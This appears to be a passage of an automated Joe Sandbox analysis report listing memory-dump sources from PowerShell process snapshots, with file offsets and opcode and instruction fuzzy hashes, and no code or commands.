                                                                                                  • Source File: 0000000D.00000002.1443551597.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7250000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6491549618017d5864b56e490dbbec34c17f13d887647dbe71bbad947334cf90
                                                                                                  • Instruction ID: 87c35a1f0bb55036f91e92d005375fd7c9d090b5341d2cfbae041e25c980c27e
                                                                                                  • Opcode Fuzzy Hash: 6491549618017d5864b56e490dbbec34c17f13d887647dbe71bbad947334cf90
                                                                                                  • Instruction Fuzzy Hash: 4B4125F1E2030B9FDB308E148945B6A77A3AFC0244F1884A5DD049B391D736DDA5CBA3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 18a56910fdd769f3c1c2b15e35af4a72c6601a8f5dfce8453123e7acd25a3318
                                                                                                  • Instruction ID: 7aaa2e05f1ca8e54bdf52cf609ece0d8adc29034bb56f2c25e056c54b8f56061
                                                                                                  • Opcode Fuzzy Hash: 18a56910fdd769f3c1c2b15e35af4a72c6601a8f5dfce8453123e7acd25a3318
                                                                                                  • Instruction Fuzzy Hash: 2B416D70A003089FEB15DFA5C8947ADFBF2BF89350F158869D045AB790DBB4AD49CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 967c392e6f01529979a9da814d1ddd8867d1e5442f5a065b4c1cbb00e7034c69
                                                                                                  • Instruction ID: 60f9c8a7eaf2ea29ec2743c3459eed51af9629c8207bc3badb253f824e3b6689
                                                                                                  • Opcode Fuzzy Hash: 967c392e6f01529979a9da814d1ddd8867d1e5442f5a065b4c1cbb00e7034c69
                                                                                                  • Instruction Fuzzy Hash: 97418F709006058FDB06CF59C4D8AAEFBB1FF48314B258199D816AB364C332FD91CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f6c6b10d05b5333a01f531d668636a8cd96c1c231dff1c6a42a28b9898b1cf4
                                                                                                  • Instruction ID: bac20a36ebcf5b895e7a946e91c9dba2f5980db207011854b224bc0f09ccb7d9
                                                                                                  • Opcode Fuzzy Hash: 2f6c6b10d05b5333a01f531d668636a8cd96c1c231dff1c6a42a28b9898b1cf4
                                                                                                  • Instruction Fuzzy Hash: A5318F70D093858FCB06CB68C894A99BFB1BF4A214B0941DAD544DB3A3C735EC05CBA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d37c5b7521e416a45a545ee288998df426f4dd5beda6bb52860802ef38b9e3b
                                                                                                  • Instruction ID: 5b1f5ed09d416cf4ada2405d390443810738b8bb4f10d652f45e8d733c11f38d
                                                                                                  • Opcode Fuzzy Hash: 2d37c5b7521e416a45a545ee288998df426f4dd5beda6bb52860802ef38b9e3b
                                                                                                  • Instruction Fuzzy Hash: FE317370A093959FC706DBA9CC94999BFB0EF4A214B0941D7D444DB3A3C734ED05CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3db40c05ef6f4b63baf3c71c0734c8731daf530144f39b67e2636dd4de7086ce
                                                                                                  • Instruction ID: 68e737ce1a5d5dcb153b4283c84314eab3f9bcf2fe94dbfd6972b047a1bf44e8
                                                                                                  • Opcode Fuzzy Hash: 3db40c05ef6f4b63baf3c71c0734c8731daf530144f39b67e2636dd4de7086ce
                                                                                                  • Instruction Fuzzy Hash: 36316030E0021C9FDB14DBA5D880BADF7F6AFC9204F14846AE415AB750CB34AD4ACB51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 872d8605626af951eb64a2caed27491a18e16b3b11f712c9b2172226a683d6b4
                                                                                                  • Instruction ID: 9ce55f445c740a5571c5ac1e3a9ec27e1637646d57be83469a550d96fb95ec4a
                                                                                                  • Opcode Fuzzy Hash: 872d8605626af951eb64a2caed27491a18e16b3b11f712c9b2172226a683d6b4
                                                                                                  • Instruction Fuzzy Hash: 28316E30E0021C9FDB14DBA4D880BEDF7F6AFC9204F2484AAE415AB750CB34AD4ACB51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b181f92c0705325071d338189c91dea714e485fff12c385085dc944c079a1c00
                                                                                                  • Instruction ID: 2ef5dd97d8818f69921932e8793dd383b60913292a7ea313b6ac1e481008b542
                                                                                                  • Opcode Fuzzy Hash: b181f92c0705325071d338189c91dea714e485fff12c385085dc944c079a1c00
                                                                                                  • Instruction Fuzzy Hash: 9C316F30E0021C9FDB15EBA4D840BEDF7F6AFC9204F24846AE415A7750CB35AE4ACB51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 16d5918142dcdaafac5d7d418922da67e0ab7e767981db6831dca134bb3bdd16
                                                                                                  • Instruction ID: 982c6c11b71715f80a6a68e6f21228552f3b1f52f329553c770d7bfbbdea9396
                                                                                                  • Opcode Fuzzy Hash: 16d5918142dcdaafac5d7d418922da67e0ab7e767981db6831dca134bb3bdd16
                                                                                                  • Instruction Fuzzy Hash: B8314E30E0021C9FDB14DBA5D980BEDF7F6AF89304F2484AAE415AB750DB35AD4ACB51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1418619637.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2b8d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3f3de4f5c3c09963256bfcbfb2dbc20b315c8ac71cf0e0eb05e8cafdca3555c6
                                                                                                  • Instruction ID: dca19785cdb0373ee394d0ffb060a7e68178adada05e5a727145c4ef70a052df
                                                                                                  • Opcode Fuzzy Hash: 3f3de4f5c3c09963256bfcbfb2dbc20b315c8ac71cf0e0eb05e8cafdca3555c6
                                                                                                  • Instruction Fuzzy Hash: 2801FD31108345EFE724AA32DC80B66FB98DF41224F08C0ABED4C0A282C7799841CAB2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1418619637.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2b8d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cecf2b00053b2a9e1ce711a7982f9925097cb88576df822e8e486dbdfb083875
                                                                                                  • Instruction ID: 3f86e12a0eec23272d88c2b913b70ee9d050fcc8362faf0f02e37a59f0a22281
                                                                                                  • Opcode Fuzzy Hash: cecf2b00053b2a9e1ce711a7982f9925097cb88576df822e8e486dbdfb083875
                                                                                                  • Instruction Fuzzy Hash: 13015E6250E3C49FD7168B258C94B62BFB4DF52224F19C1DBD9888F1D3C2699848C772
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6da8a65c739aaa89915e67075d340dca6056d4b98e7d645130ae2e5d4af66f99
                                                                                                  • Instruction ID: 0b753403f53b000b2ff823348ed4f81d9ce7b2a21fe45b7febe3ce7edc7674d3
                                                                                                  • Opcode Fuzzy Hash: 6da8a65c739aaa89915e67075d340dca6056d4b98e7d645130ae2e5d4af66f99
                                                                                                  • Instruction Fuzzy Hash: D401E874A082098FC780DF68D4859AEBBF0FF49310F5152A9E905DB321D731A944CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7708c0ab6907d3709cea7763445db55f1cf5d4a3c496c43e07e9cd70fe24ccb2
                                                                                                  • Instruction ID: c1e22beb7a772d78e8b428e7dd77b46d30b4d08ea307bc7175214d6be3e40ba6
                                                                                                  • Opcode Fuzzy Hash: 7708c0ab6907d3709cea7763445db55f1cf5d4a3c496c43e07e9cd70fe24ccb2
                                                                                                  • Instruction Fuzzy Hash: 46F0B430200304CFC7259B18E414B96B7A9FFC6718B0684EEE4088F761CB35DC89CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a609dbc2c9b880614bae99da42ac8843775aa9a9a64df2767176032e5636ffd9
                                                                                                  • Instruction ID: 4ea0dbbc6487ba1e9d0f9dd4f9b3de737a283add7eb652eeb3a42c21943550b9
                                                                                                  • Opcode Fuzzy Hash: a609dbc2c9b880614bae99da42ac8843775aa9a9a64df2767176032e5636ffd9
                                                                                                  • Instruction Fuzzy Hash: 94F0A974E0420ACFC780DFA8C485AAEBBF4BF49310F504199D509DB321D730E951CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000014.00000002.1646850289.0000000003EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03EDD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_20_2_3edd000_powershell.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000014.00000002.1646850289.0000000003EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03EDD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_20_2_3edd000_powershell.jbxd